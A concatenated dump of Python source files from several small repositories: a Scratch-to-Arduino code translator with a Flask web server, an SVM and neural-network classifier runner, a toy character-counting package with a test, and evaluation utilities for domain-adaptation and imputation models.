def parse(self, statement_json):
self.condition = ScratchExpression.instantiate(statement_json[1])
self.if_block = ScratchCodeBlock(statement_json[2], indent=self.indent+1)
self.else_block = ScratchCodeBlock(statement_json[3], indent=self.indent+1)
def to_arduino(self):
return "\n".join([
self.indented("if ({}) {{".format(self.condition.to_arduino())),
self.if_block.to_arduino(),
self.indented("} else {"),
self.else_block.to_arduino(),
self.indented("}")
])
class DoRepeat(ScratchStatement):
def parse(self, statement_json):
self.repeats = ScratchExpression.instantiate(statement_json[1])
self.block = ScratchCodeBlock(statement_json[2], indent=self.indent+1)
self.counter_name = "counter_{}".format(randint(0,100000))
def to_arduino(self):
return "\n".join([
self.indented("for (int {} = 0; {} < {}; {}++) {{".format(self.counter_name,
self.counter_name, self.repeats.to_arduino(), self.counter_name)),
self.block.to_arduino(),
self.indented("}")
])
class DoForever(ScratchStatement):
def parse(self, statement_json):
self.block = ScratchCodeBlock(statement_json[1], indent=self.indent+1)
def to_arduino(self):
return "\n".join([
self.indented("while (true) {"),
self.block.to_arduino(),
self.indented("}")
])
class ScratchExpression(ScratchRepresentation):
""" Represents an expression that evaluates to a number, string, or boolean.
In Scratch, these will be shaped as hexagons or rounded rectangles. """
arduino_rep = "(EXPRESSION)"
@classmethod
def instantiate(cls, exp_json):
return cls.identify(exp_json)(exp_json)
@classmethod
def identify(cls, exp_json):
if isinstance(exp_json, basestring):
if re.match("^-?[0-9\.]*$", exp_json):
return LiteralNumber
else:
return LiteralString
elif isinstance(exp_json, (int, float)):
return LiteralNumber
else:
try:
identifier = exp_json[0]
return EXPRESSION_IDENTIFIERS[identifier]
except KeyError:
raise BlockNotSupportedError("No expression matches {}".format(identifier))
class Literal():
def parse(self, value):
self.value = value
def to_arduino(self):
return json.dumps(self.value)
class LiteralString(ScratchExpression):
def parse(self, value):
self.value = value
def to_arduino(self):
return json.dumps(self.value)
class LiteralNumber(ScratchExpression):
def parse(self, value):
if isinstance(value, (int, float)):
self.value = value
else:
try:
self.value = int(value)
except ValueError:
self.value = float(value)
def to_arduino(self):
return json.dumps(self.value)
class BinaryOperator(ScratchExpression):
operator = "(SYMBOL)"
def parse(self, exp_json):
self.arg1 = ScratchExpression.instantiate(exp_json[1])
self.arg2 = ScratchExpression.instantiate(exp_json[2])
def to_arduino(self):
return "({} {} {})".format(self.arg1.to_arduino(), self.operator,
self.arg2.to_arduino())
class Equals(BinaryOperator):
operator = "=="
class Add(BinaryOperator):
operator = "+"
class Subtract(BinaryOperator):
operator = "-"
class Multiply(BinaryOperator):
operator = "*"
class Divide(BinaryOperator):
operator = "/"
class Modulo(BinaryOperator):
operator = "%"
class GreaterThan(BinaryOperator):
operator = ">"
class LessThan(BinaryOperator):
operator = "<"
class And(BinaryOperator):
operator = "&&"
class ReadVar(ScratchExpression):
def __init__(self, exp_json, namespace=None):
self.varName = clean_name(exp_json[1])
if namespace and self.varName not in namespace:
raise ValueError("{} is not a variable in {}".format(
self.varName, namespace))
def to_arduino(self):
return self.varName
class KeyPressed(ScratchExpression):
"NOT REALLY SUPPORTED"
def parse(self, exp_json):
self.key = exp_json[1]
def to_arduino(self):
return '(false == "{} KEY PRESSED")'.format(self.key)
class GetParam(ScratchExpression):
def __init__(self, exp_json, namespace=None):
self.varName = clean_name(exp_json[1])
if namespace and self.varName not in namespace:
raise ValueError("{} is not a parameter in {}".format(
self.varName, namespace))
def to_arduino(self):
return self.varName
class RandomFromTo(ScratchExpression):
def parse(self, exp_json):
self.fromVal = exp_json[1]
self.toVal = exp_json[2]
def to_arduino(self):
return "random({}, {})".format(self.fromVal, self.toVal)
class Call(ScratchStatement):
def parse(self, statement_json):
self.function_name = clean_name(statement_json[1])
self.args = [ScratchExpression.instantiate(arg) for arg in statement_json[2:]]
def to_arduino(self):
arduino_args = [arg.to_arduino() for arg in self.args]
return self.indented(
"{}({});".format(self.function_name, ", ".join(arduino_args))
)
class NullStatement(ScratchStatement):
def to_arduino(self):
return None
BLOCK_IDENTIFIERS = {
# 'procDef' : Function,
# '=' : OpEq,
# '>' : OpGt,
# '<' : OpLt,
# '+' : OpPlus,
# '-' : OpMinus,
# '*' : OpTimes,
# '/' : OpDiv,
# '%' : OpMod,
# 'getParam' : ParamGet,
# 'readVariable': VarGet,
}
STATEMENT_IDENTIFIERS = {
'doIf' : DoIf,
'doRepeat' : DoRepeat,
'doForever' : DoForever,
'call' : Call,
'doIfElse' : DoIfElse,
'setVar:to:': SetVar,
'changeVar:by:': ChangeVarBy,
'setLine:ofList:to:': SetListItemValue,
'broadcast:': Broadcast,
'wait:elapsed:from:': Wait,
# These have effects that don't map to Arduino
# Currently, we just trash them.
'hide' : NullStatement,
"createCloneOf" : NullStatement,
"doWaitUntil" : NullStatement,
"lookLike:" : NullStatement,
"setGraphicEffect:to:" : NullStatement,
"gotoX:y:" : NullStatement,
# Can't do these properly yet.
# Need to fake dynamic arrays...
"deleteLine:ofList:" : NullStatement,
"append:toList:" : NullStatement,
}
EXPRESSION_IDENTIFIERS = {
"=" : Equals,
"+" : Add,
"-" : Subtract,
"*" : Multiply,
"/" : Divide,
"%" : Modulo,
">" : GreaterThan,
"<" : LessThan,
"readVariable" : ReadVar,
"getParam" : GetParam,
"keyPressed:" : KeyPressed,
"randomFrom:to:": RandomFromTo,
"&" : And
}
SCRIPT_IDENTIFIERS = {
"procDef" : Function,
"whenIReceive" : EventBinding,
"whenGreenFlag" : GreenFlag,
"createCloneOf" : NullScript,
"whenCloned" : NullScript,
"think:" : NullScript
}
|
{"/scratch_object.py": ["/scratch_blocks.py"]}
|
28,005
|
cproctor/scratch2arduino
|
refs/heads/master
|
/test/test_translator.py
|
from translator import *
import json
with open('test_cases.json') as testfile:
test_data = json.load(testfile)
for expression in test_data['expressions']:
print("EXPRESSION: {}".format(expression))
exp = ScratchExpression.instantiate(expression)
print(exp.to_arduino())
for statement in test_data['statements']:
print("STATEMENT: {}".format(statement))
st = ScratchStatement.instantiate(statement)
print(st.to_arduino())
for script in test_data['scripts']:
print("SCRIPT: {}".format(script))
sc = ScratchScript.instantiate(script)
print(sc.to_arduino())
with open('sample_project.json') as projectfile:
project_json = json.load(projectfile)
project = ScratchObject(project_json)
script = project.get_script("instructions_for_each_update")
print(script.to_arduino())
|
{"/scratch_object.py": ["/scratch_blocks.py"]}
|
28,006
|
cproctor/scratch2arduino
|
refs/heads/master
|
/scratch_object.py
|
# This is not ver general_purpose yet...
# Have the app ping the CDN every 30 seconds; track when the student clicks for an update as well.
# Check for when a program's hash changes.
from scratch_blocks import *
TYPE_TRANSLATIONS = {
"int": "int",
"str": "String",
"unicode": "String",
"float": "float"
}
class ScratchObject(object):
def __init__(self, object_json):
if object_json.get('info', {}).get('projectID'):
self.project_id = object_json.get('info').get('projectID')
else:
self.project_id = None
self.name = object_json.get('objName')
self.state = {}
self.scripts = []
self.children = []
self.translation_errors = []
for var in object_json.get('variables', []):
self.state[clean_name(var['name'])] = var['value']
for lis in object_json.get('lists', []):
self.state[clean_name(lis['listName'])] = lis['contents']
for script_json in object_json.get('scripts', []):
self.scripts.append(ScratchScript.instantiate(script_json))
for child_json in object_json.get('children', []):
if child_json.get('objName'):
self.children.append(ScratchObject(child_json))
def __str__(self):
return "<ScratchObject {}>".format(self.name)
def __repr__(self):
return "<ScratchObject {}>".format(self.name)
def is_a_project(self):
return self.project_id is not None
def get_script(self, script_name):
for script in self.get_scripts():
if script.name == script_name:
return script
def get_scripts(self):
all_scripts = []
all_scripts += self.scripts
for child in self.children:
all_scripts += child.scripts
return all_scripts
def get_state(self):
state = {}
state.update(self.state)
for child in self.children:
state.update(child.get_state())
return state
def state_to_arduino(self, exclude=None, include=None, indent=0):
translations = []
if not exclude:
exclude = []
for key, val in self.get_state().items():
if (key in exclude) or (include and (key not in include)):
continue
if isinstance(val, list):
type_sigs = list(set(type(i).__name__ for i in val))
if len(type_sigs) == 1:
type_sig = type_sigs[0]
elif len(type_sigs) == 0:
type_sig = 'int'
self.warn("Could not infer type for empty list {}".format(key))
else:
type_sig = type_sigs[0]
self.warn("Not all items in list {} are of type {}".format(key, type_sig))
translations.append("{} {}[{}] = {{ {} }};".format(
TYPE_TRANSLATIONS[type_sig],
clean_name(key), len(val), ", ".join(json.dumps(v) for v in val)
))
else:
type_sig = type(val).__name__
translations.append("{} {} = {};".format(
TYPE_TRANSLATIONS[type_sig], key, json.dumps(val)
))
return "\n".join(" " * indent + t for t in translations)
def warn(self, warning):
self.translation_errors.append(warning)
|
{"/scratch_object.py": ["/scratch_blocks.py"]}
|
28,007
|
cproctor/scratch2arduino
|
refs/heads/master
|
/scratch2arduino_server.py
|
# Note: log everything in sqlite!
from flask import Flask
from scratch_object import *
import requests
import json
from jinja2 import Environment, FileSystemLoader
from os.path import dirname, realpath
import traceback
import logging
import datetime
log = logging.getLogger(__name__)
handler = logging.FileHandler("/var/log/scratch2arduino.log")
log.addHandler(handler)
log.setLevel(logging.INFO)
class NotFoundError(Exception):
pass
env = Environment(loader=FileSystemLoader(dirname(realpath(__file__))))
program_template = env.get_template("neopixel_template.html")
base_template = env.get_template("base_template.html")
landing_template = env.get_template("landing_template.html")
app = Flask(__name__)
excluded_vars = [
"acceleration",
"colorOffset",
"isMoving",
"howManyLights",
"mainColor",
"mainColorValue",
"lightColor",
"myLightNumber",
"lightMode",
"secondColorValue",
"lightIndex",
"secondColor",
"ready",
"changeInAcceleration",
"speed"
]
excluded_scripts = [
"waitATick",
"setLightToRgb",
"findMainAndSecondColors",
"loop",
"setup",
"findColorOffset",
"turnOffLight",
"turnOnLight",
"setupLights",
"scaleColorValues",
"reset"
]
def include_script(script):
if not script.name:
return False
if script.name in excluded_scripts:
return False
if isinstance(script, EventBinding):
return False
return True
def change_indent(code, spaces):
statements = code.split("\n")
if spaces > 0:
statements = [(" " * spaces) + s for s in statements]
else:
statements = [s[(spaces * -1):] for s in statements]
return "\n".join(statements)
# We mocked reading the motion sensor with a variable. Time to undo that.
motion_sensor = False
unpatched_to_arduino = Equals.to_arduino
def patched_to_arduino(self):
special_case = False
if (isinstance(self.arg1, ReadVar) and self.arg1.varName == "isMoving"):
special_case = True
val = self.arg2
if (isinstance(self.arg2, ReadVar) and self.arg2.varName == "isMoving"):
special_case = True
val = self.arg1
if special_case and isinstance(val, LiteralString):
if val.value == "YES":
return "motionSensor.moving()"
else:
return "!motionSensor.moving()"
else:
return unpatched_to_arduino(self)
Equals.to_arduino = patched_to_arduino
unpatched_init = Equals.__init__
def patched_init(*args, **kwargs):
global motion_sensor
motion_sensor = True
unpatched_init(*args, **kwargs)
Equals.__init__ = patched_init
unpatched_rv_init = ReadVar.__init__
def patched_rv_init(self, *args, **kwargs):
unpatched_rv_init(self, *args, **kwargs)
if self.varName == "acceleration":
global motion_sensor
motion_sensor = True
ReadVar.__init__ = patched_rv_init
unpatched_rv_to_arduino = ReadVar.to_arduino
def patched_rv_to_arduino(self):
if self.varName == "acceleration":
return "motionSensor.intensity()"
else:
return unpatched_rv_to_arduino(self)
ReadVar.to_arduino = patched_rv_to_arduino
def get_scratch_project(scratch_id):
response = requests.get("http://cdn.projects.scratch.mit.edu/internalapi/project/{}/get/".format(scratch_id))
if response.ok:
return response.json()
elif response.status_code == 404:
raise NotFoundError("Invalid project ID")
else:
return 0
@app.route('/')
def landing():
try:
return landing_template.render()
except e:
return traceback.format_exc()
def scratch_project_json_to_arduino(scratch_project):
project = ScratchObject(scratch_project)
init_vars = project.state_to_arduino(exclude=excluded_vars, indent=0)
setup = project.get_script("setup").block.to_arduino()
loop = project.get_script("loop").block.to_arduino()
helpers = "\n".join(s.to_arduino() for s in project.get_scripts() if include_script(s))
return program_template.render(
init_vars=init_vars,
setup=setup,
loop=loop,
helpers=helpers,
motion_sensor=motion_sensor
)
@app.route('/translate/<int:scratch_id>')
def translate(scratch_id):
try:
project_json = get_scratch_project(scratch_id)
program = scratch_project_json_to_arduino(project_json)
now = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')
log.info(json.dumps({"time": now, "project": project_json}))
return baes_template.render(
program=program,
project_id=scratch_id
)
except Exception, e:
return "<h1>Something went wrong:</h1> <pre>{}</pre>".format(traceback.format_exc())
if __name__ == '__main__':
app.run()
|
{"/scratch_object.py": ["/scratch_blocks.py"]}
|
28,008
|
rakshithxaloori/svm-ann
|
refs/heads/main
|
/classifier.py
|
import pandas as pd
import numpy as np
from sklearn.pipeline import make_pipeline
from sklearn.preprocessing import StandardScaler
from sklearn.neural_network import MLPClassifier
from sklearn.svm import SVC
def test_classifier(clf, X, y):
""" RETURN the accuracy on data X, y using classifier clf. """
prediction_values = clf.predict(X)
acc_count = 0
for prediction, gold in zip(prediction_values, y):
if prediction == gold:
acc_count += 1
return acc_count/len(y)
def svm_tasks(X_train, y_train, X_test, y_test, C_value, clf_type):
if clf_type == 'poly':
clf = make_pipeline(StandardScaler(), SVC(C=C_value, gamma='auto', kernel=clf_type, degree=2))
else:
clf = make_pipeline(StandardScaler(), SVC(C=C_value, gamma='auto', kernel=clf_type))
np_X_train = np.array(X_train)
np_y_train = np.array(y_train)
# Testing
clf.fit(np_X_train, np_y_train)
print("kernel:", clf_type)
print("C_value:", C_value)
print("Accuracy:", test_classifier(clf, X_train, y_train), "on TRAIN data")
print("Accuracy:", test_classifier(clf, X_test, y_test), "on TEST data")
print("-----------------------------------------------------")
def ann_tasks(X_train, y_train, X_test, y_test, hidden_layers, learning_rate):
clf = MLPClassifier(hidden_layer_sizes=hidden_layers, solver='sgd', learning_rate_init=learning_rate,)
np_X_train = np.array(X_train)
np_y_train = np.array(y_train)
# Testing
clf.fit(np_X_train, np_y_train)
print("architecture:", hidden_layers)
print("#output layers:", clf.n_outputs_)
print("learning rate:", learning_rate)
print("Accuracy:", test_classifier(clf, X_train, y_train), "on TRAIN data")
print("Accuracy:", test_classifier(clf, X_test, y_test), "on TEST data")
print("-----------------------------------------------------")
|
{"/runner.py": ["/classifier.py"]}
|
28,009
|
rakshithxaloori/svm-ann
|
refs/heads/main
|
/runner.py
|
import sys
import csv
from sklearn.model_selection import train_test_split
from classifier import svm_tasks, ann_tasks
def convert_row_to_int(row):
new_row = []
for value in row:
new_row.append(float(value))
return new_row
if __name__ == "__main__":
if len(sys.argv) != 2:
sys.exit("Usage: python runner.py csv_path")
csv_path = sys.argv[1]
X = []
y = []
with open(csv_path, 'r') as csv_file:
reader = csv.reader(csv_file, delimiter=";")
for row in reader:
X.append(convert_row_to_int(row[:-1]))
y.append(row[-1])
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, shuffle=True)
# Perform tasks
print("SVMs")
clf_types = ['linear', 'poly', 'rbf']
# C_values obtained emphirically
C_values = [10.0, 100.0, 100.0]
for C_value, clf_type in zip(C_values, clf_types):
svm_tasks(X_train, y_train, X_test, y_test, C_value, clf_type)
print("**********************************************************")
print("**********************************************************")
print("ANNs")
# hidden layers, nodes, learning rate
for hidden_layers in [(), (2,), (6,), (2, 3,), (3, 2,)]:
for learning_rate in [0.1, 0.01, 0.001, 0.0001, 0.00001]:
ann_tasks(X_train, y_train, X_test, y_test, hidden_layers, learning_rate)
|
{"/runner.py": ["/classifier.py"]}
|
28,019
|
prabhath6/my_project
|
refs/heads/master
|
/my_project/module_one.py
|
# -*- coding: utf-8 -*-
from collections import Counter
def get_char_count(data):
"""
:param data: str
:return: Counter
"""
c = Counter(data)
return c
|
{"/main.py": ["/my_project/module_two.py"]}
|
28,020
|
prabhath6/my_project
|
refs/heads/master
|
/main.py
|
from my_project.module_two import custom_count
if __name__ == "__main__":
print(custom_count("AAAAsdfsdvver", 3))
|
{"/main.py": ["/my_project/module_two.py"]}
|
28,021
|
prabhath6/my_project
|
refs/heads/master
|
/my_project/module_two.py
|
# -*- coding: utf-8 -*-
from my_project import module_one
def custom_count(data, count):
"""
:param data: str
:param count: int
:return: list
"""
c = module_one.get_char_count(data)
return [(i, j) for i, j in c.items() if j >= count]
|
{"/main.py": ["/my_project/module_two.py"]}
|
28,022
|
prabhath6/my_project
|
refs/heads/master
|
/tests/test_module_two.py
|
from my_project import module_two
from nose.tools import assert_equal
class TestModuleTwo():
@classmethod
def setup_class(klass):
"""This method is run once for each class before any tests are run"""
@classmethod
def teardown_class(klass):
"""This method is run once for each class _after_ all tests are run"""
def setUp(self):
"""This method is run once before _each_ test method is executed"""
def teardown(self):
"""This method is run once after _each_ test method is executed"""
def test_module_two(self):
expected = module_two.custom_count("AAAAsdfsdvver", 3)
actual = [('A', 4)]
assert_equal(expected, actual)
|
{"/main.py": ["/my_project/module_two.py"]}
|
28,027
|
mkirchmeyer/adaptation-imputation
|
refs/heads/main
|
/src/eval/utils_eval.py
|
import torch.nn.functional as F
from src.utils.utils_network import build_label_domain
import torch
from sklearn.metrics import roc_auc_score
import numpy as np
np.set_printoptions(precision=4, formatter={'float_kind':'{:3f}'.format})
def evaluate_domain_classifier_class(model, data_loader, domain_label, is_target, is_criteo=False):
model.feat_extractor.eval()
model.data_classifier.eval()
model.grl_domain_classifier.eval()
loss = 0
correct = 0
ave_pred = 0
if is_criteo:
for dataI, dataC, _ in data_loader:
target = build_label_domain(model, dataI.size(0), domain_label)
if model.cuda:
dataI, dataC, target = dataI.cuda(), dataC.cuda(), target.cuda()
data = model.construct_input(dataI, dataC)
output_feat = model.feat_extractor(data)
output = model.grl_domain_classifier(output_feat)
loss += F.cross_entropy(output, target).item()
pred = output.data.max(1)[1] # get the index of the max log-probability
correct += pred.eq(target.data).cpu().sum().item()
ave_pred += torch.mean(F.softmax(output)[:, 1]).item()
else:
for data, _ in data_loader:
target = build_label_domain(model, data.size(0), domain_label)
if model.cuda:
data, target = data.cuda(), target.cuda()
if model.adapt_only_first:
data = torch.mul(data, model.mask_t)
output_feat = model.feat_extractor(data)
else:
if is_target and model.crop_dim != 0:
data = torch.mul(data, model.mask_t)
output_feat = model.feat_extractor(data)
output = model.grl_domain_classifier(output_feat)
loss += F.cross_entropy(output, target).item()
pred = output.data.max(1)[1] # get the index of the max log-probability
correct += pred.eq(target.data).cpu().sum().item()
ave_pred += torch.mean(F.softmax(output)[:, 1]).item()
return loss, correct, ave_pred
def evaluate_domain_classifier(model, data_loader_s, data_loader_t, comments="Domain", is_criteo=False):
model.feat_extractor.eval()
model.data_classifier.eval()
model.grl_domain_classifier.eval()
loss_s, correct_s, ave_pred_s = evaluate_domain_classifier_class(model, data_loader_s, model.domain_label_s,
is_target=False, is_criteo=is_criteo)
loss_t, correct_t, ave_pred_t = evaluate_domain_classifier_class(model, data_loader_t, model.domain_label_t,
is_target=True, is_criteo=is_criteo)
loss_s += loss_t
loss_s /= (len(data_loader_s) + len(data_loader_t))
nb_source = len(data_loader_s.dataset)
nb_target = len(data_loader_t.dataset)
nb_tot = nb_source + nb_target
model.logger.info(
"{}: Mean loss: {:.4f}, Accuracy: {}/{} ({:.2f}%), Accuracy S: {}/{} ({:.2f}%), Accuracy T: {}/{} "
"({:.2f}%)".format(
comments, loss_s, correct_s + correct_t, nb_tot, 100. * (correct_s + correct_t) / nb_tot, correct_s,
nb_source, 100. * correct_s / nb_source, correct_t, nb_target, 100. * correct_t / nb_target))
return loss_s, (correct_s + correct_t) / nb_tot
def evaluate_data_classifier(model, is_test=True, is_target=False, is_criteo=False):
model.feat_extractor.eval()
model.data_classifier.eval()
comments = ""
if is_test:
comments += "Test"
if is_target:
comments += " T"
data_loader = model.data_loader_test_t
else:
comments += " S"
data_loader = model.data_loader_test_s
else:
comments += "Train"
if is_target:
comments += " T"
data_loader = model.data_loader_train_t
else:
comments += " S"
data_loader = model.data_loader_train_s
test_loss = 0
naive_loss = 0
correct = 0
prediction_prob = []
test_y = []
naive_pred = 246872. / 946493.
if is_criteo:
for dataI, dataC, target in data_loader:
target = target.view(-1)
naive_output = torch.Tensor([1 - naive_pred, naive_pred]).repeat(dataI.size(0), 1)
if model.cuda:
dataI, dataC, target = dataI.cuda(), dataC.cuda(), target.cuda()
naive_output = naive_output.cuda()
data = model.construct_input(dataI, dataC)
output_feat = model.feat_extractor(data)
output = model.data_classifier(output_feat)
test_loss += F.cross_entropy(output, target).item()
naive_loss += F.nll_loss(torch.log(naive_output), target).item()
pred = output.data.max(1)[1] # get the index of the max log-probability
correct += pred.eq(target.data).cpu().sum().item()
prediction_prob = np.hstack([prediction_prob, output.cpu().detach().numpy()[:, 1]])
test_y = np.hstack([test_y, target.cpu().numpy()])
else:
for data, target in data_loader:
target = target.view(-1)
if model.cuda:
data, target = data.cuda(), target.cuda()
if model.adapt_only_first:
data = torch.mul(data, model.mask_t)
elif is_target and model.crop_dim != 0:
data = torch.mul(data, model.mask_t)
output_feat = model.feat_extractor(data)
output = model.data_classifier(output_feat)
test_loss += F.cross_entropy(output, target).item()
pred = output.data.max(1)[1] # get the index of the max log-probability
correct += pred.eq(target.data).cpu().sum().item()
test_loss /= len(data_loader) # loss function already averages over batch size
naive_loss /= len(data_loader)
auc_roc = 0.0
weighted_acc = 0.0
model.logger.info(
"{}: Mean Loss: {:.4f}, Accuracy: {}/{} ({:.2f}%)".format(
comments, test_loss, correct, len(data_loader.dataset), 100. * correct / len(data_loader.dataset)))
if is_criteo:
model.logger.info("{}: Naive classifier mean Loss: {:.4f}".format(comments, naive_loss))
auc_roc = roc_auc_score(test_y, prediction_prob)
model.logger.info("{}: auc_roc: {:.4f}".format(comments, auc_roc))
return test_loss, correct / len(data_loader.dataset), weighted_acc, auc_roc
##############
# Imputation #
##############
def compute_mse_imput(model, is_target=False, is_criteo=False):
model.feat_extractor1.eval()
model.feat_extractor2.eval()
model.reconstructor.eval()
dist = 0
if is_target:
data_loader = model.data_loader_test_t
comments = "T"
else:
data_loader = model.data_loader_test_s
comments = "S"
if is_criteo:
for dataI, dataC, _ in data_loader:
if model.cuda:
dataI, dataC = dataI.cuda(), dataC.cuda()
data1 = model.construct_input1(dataI, dataC)
output_feat1 = model.feat_extractor1(data1)
output_feat2_reconstr = model.reconstructor(output_feat1)
data2 = model.construct_input2(dataI)
output_feat2 = model.feat_extractor2(data2)
mean_norm = (torch.norm(output_feat2).item() + torch.norm(output_feat2_reconstr).item()) / 2
dist += torch.dist(output_feat2, output_feat2_reconstr, 2).item() / mean_norm
else:
for data, _ in data_loader:
if model.cuda:
data = data.cuda()
data2 = torch.mul(data, model.mask_2)
output_feat2 = model.feat_extractor2(data2)
data1 = torch.mul(data, model.mask_1)
output_feat1 = model.feat_extractor1(data1)
output_feat2_reconstr = model.reconstructor(output_feat1)
mean_norm = (torch.norm(output_feat2).item() + torch.norm(output_feat2_reconstr).item()) / 2
dist += torch.dist(output_feat2, output_feat2_reconstr, 2).item() / mean_norm
dist /= len(data_loader)
if model.logger is not None:
model.logger.info(f"Mean NMSE {comments}: {dist}")
return dist
def evaluate_data_imput_classifier(model, is_test=True, is_target=False, is_criteo=False):
model.feat_extractor1.eval()
model.feat_extractor2.eval()
model.data_classifier.eval()
model.reconstructor.eval()
comments = "Imput"
if is_test:
comments += " test"
if is_target:
comments += " T"
data_loader = model.data_loader_test_t
else:
comments += " S"
data_loader = model.data_loader_test_s
else:
comments += " train"
if is_target:
comments += " T"
data_loader = model.data_loader_train_t
else:
comments += " S"
data_loader = model.data_loader_train_s
test_loss = 0
correct = 0
prediction_prob = []
test_y = []
if is_criteo:
for dataI, dataC, target in data_loader:
target = target.view(-1)
if model.cuda:
dataI, dataC, target = dataI.cuda(), dataC.cuda(), target.cuda()
data1 = model.construct_input1(dataI, dataC)
output_feat1 = model.feat_extractor1(data1)
if is_target:
output_feat2 = model.reconstructor(output_feat1)
else:
data2 = model.construct_input2(dataI)
output_feat2 = model.feat_extractor2(data2)
output = model.data_classifier(torch.cat((output_feat1, output_feat2), 1))
test_loss += F.cross_entropy(output, target).item()
pred = output.data.max(1)[1] # get the index of the max log-probability
correct += pred.eq(target.data).cpu().sum().item()
prediction_prob = np.hstack([prediction_prob, output.cpu().detach().numpy()[:, 1]])
test_y = np.hstack([test_y, target.cpu().numpy()])
else:
for data, target in data_loader:
target = target.view(-1)
if model.cuda:
data, target = data.cuda(), target.cuda()
data1 = torch.mul(data, model.mask_1)
output_feat1 = model.feat_extractor1(data1)
if is_target:
output_feat2 = model.reconstructor(output_feat1)
else:
data2 = torch.mul(data, model.mask_2)
output_feat2 = model.feat_extractor2(data2)
output = model.data_classifier(torch.cat((output_feat1, output_feat2), 1))
test_loss += F.cross_entropy(output, target).item()
pred = output.data.max(1)[1] # get the index of the max log-probability
correct += pred.eq(target.data).cpu().sum().item()
test_loss /= len(data_loader) # loss function already averages over batch size
model.logger.info(
"{}: Mean Loss: {:.4f}, Accuracy: {}/{} ({:.2f}%)".format(
comments, test_loss, correct, len(data_loader.dataset), 100. * correct / len(data_loader.dataset)))
auc_roc = 0
w_acc = 0
if is_criteo:
auc_roc = roc_auc_score(test_y, prediction_prob)
model.logger.info("{}: auc_roc: {:.4f}".format(comments, auc_roc))
return test_loss, correct / len(data_loader.dataset), w_acc, auc_roc
def evaluate_domain_imput_classifier(model, data_loader_s, data_loader_t, is_imputation, comments="Domain",
is_criteo=False):
model.feat_extractor1.eval()
model.feat_extractor2.eval()
model.data_classifier.eval()
model.grl_domain_classifier1.eval()
model.grl_domain_classifier2.eval()
model.reconstructor.eval()
if is_imputation:
loss_s, correct_s = evaluate_domain_imput_classifier_class(model, data_loader_s,
model.domain_label_true2,
is_imputation=True, is_target=False,
is_criteo=is_criteo)
loss_t, correct_t = evaluate_domain_imput_classifier_class(model, data_loader_s,
model.domain_label_fake2,
is_imputation=True, is_target=True,
is_criteo=is_criteo)
compute_mse_imput(model, is_target=True, is_criteo=is_criteo)
compute_mse_imput(model, is_target=False, is_criteo=is_criteo)
else:
loss_s, correct_s = evaluate_domain_imput_classifier_class(model, data_loader_s, model.domain_label_s,
is_imputation=False, is_target=False,
is_criteo=is_criteo)
loss_t, correct_t = evaluate_domain_imput_classifier_class(model, data_loader_t, model.domain_label_t,
is_imputation=False, is_target=True,
is_criteo=is_criteo)
loss_s += loss_t
nb_source = len(data_loader_s.dataset)
if is_imputation:
nb_target = len(data_loader_s.dataset)
else:
nb_target = len(data_loader_t.dataset)
nb_tot = nb_source + nb_target
model.logger.info(
"{}: Mean loss: {:.4f}, Accuracy: {}/{} ({:.2f}%), Accuracy S: {}/{} ({:.2f}%), Accuracy T: "
"{}/{} ({:.0f}%)".format(
comments, loss_s, correct_s + correct_t, nb_tot, 100. * (correct_s + correct_t) / nb_tot, correct_s,
nb_source, 100. * correct_s / nb_source, correct_t, nb_target, 100. * correct_t / nb_target))
return loss_s, (correct_s + correct_t) / nb_tot
def evaluate_domain_imput_classifier_class(model, data_loader, domain_label, is_imputation=True, is_target=False,
is_criteo=False):
model.feat_extractor1.eval()
model.feat_extractor2.eval()
model.data_classifier.eval()
model.grl_domain_classifier1.eval()
model.grl_domain_classifier2.eval()
model.reconstructor.eval()
loss = 0
correct = 0
if is_criteo:
for dataI, dataC, target in data_loader:
target = target.view(-1)
if model.cuda:
dataI, dataC, target = dataI.cuda(), dataC.cuda(), target.cuda()
if is_imputation:
if not is_target:
data2 = model.construct_input2(dataI)
output_feat2 = model.feat_extractor2(data2)
output = model.grl_domain_classifier2(output_feat2)
else:
data1 = model.construct_input1(dataI, dataC)
output_feat1 = model.feat_extractor1(data1)
output_feat2 = model.reconstructor(output_feat1)
output = model.grl_domain_classifier2(output_feat2)
else:
data1 = model.construct_input1(dataI, dataC)
output_feat1 = model.feat_extractor1(data1)
output_feat2 = model.reconstructor(output_feat1)
output = model.grl_domain_classifier1(torch.cat((output_feat1, output_feat2), 1))
loss += F.cross_entropy(output, target).item()
pred = output.data.max(1)[1] # get the index of the max log-probability
correct += pred.eq(target.data).cpu().sum().item()
else:
for data, _ in data_loader:
target = build_label_domain(model, data.size(0), domain_label)
if model.cuda:
data, target = data.cuda(), target.cuda()
if is_imputation:
if not is_target:
data2 = torch.mul(data, model.mask_2)
output_feat2 = model.feat_extractor2(data2)
output = model.grl_domain_classifier2(output_feat2)
else:
data1 = torch.mul(data, model.mask_1)
output_feat1 = model.feat_extractor1(data1)
output_feat2 = model.reconstructor(output_feat1)
output = model.grl_domain_classifier2(output_feat2)
else:
data1 = torch.mul(data, model.mask_1)
output_feat1 = model.feat_extractor1(data1)
output_feat2 = model.reconstructor(output_feat1)
output = model.grl_domain_classifier1(torch.cat((output_feat1, output_feat2), 1))
loss += F.cross_entropy(output, target).item()
pred = output.data.max(1)[1] # get the index of the max log-probability
correct += pred.eq(target.data).cpu().sum().item()
return loss, correct
|
{"/src/eval/utils_eval.py": ["/src/utils/utils_network.py"], "/experiments/launcher/criteo_binary.py": ["/experiments/launcher/config.py", "/src/dataset/utils_dataset.py", "/src/models/criteo/dann_criteo.py", "/src/utils/utils_network.py"], "/src/models/digits/djdot_imput_digits.py": ["/experiments/launcher/config.py", "/src/eval/utils_eval.py", "/src/models/digits/djdot_digits.py", "/src/plotting/utils_plotting.py", "/src/utils/network.py", "/src/utils/utils_network.py"], "/src/models/digits/djdot_digits.py": ["/experiments/launcher/config.py", "/src/eval/utils_eval.py", "/src/plotting/utils_plotting.py", "/src/utils/network.py", "/src/utils/utils_network.py"], "/experiments/launcher/digits_binary.py": ["/experiments/launcher/config.py", "/src/dataset/utils_dataset.py", "/src/models/digits/dann_imput_digits.py", "/src/models/digits/djdot_imput_digits.py", "/src/models/digits/djdot_digits.py", "/src/utils/utils_network.py"], "/src/plotting/utils_plotting.py": ["/src/utils/utils_network.py"], "/experiments/__init__.py": ["/experiments/launcher/experiments_criteo.py", "/experiments/launcher/experiments_mnist_mnistm.py"], "/src/dataset/utils_dataset.py": ["/src/dataset/dataset_criteo.py", "/experiments/launcher/config.py", "/src/dataset/sampler.py"], 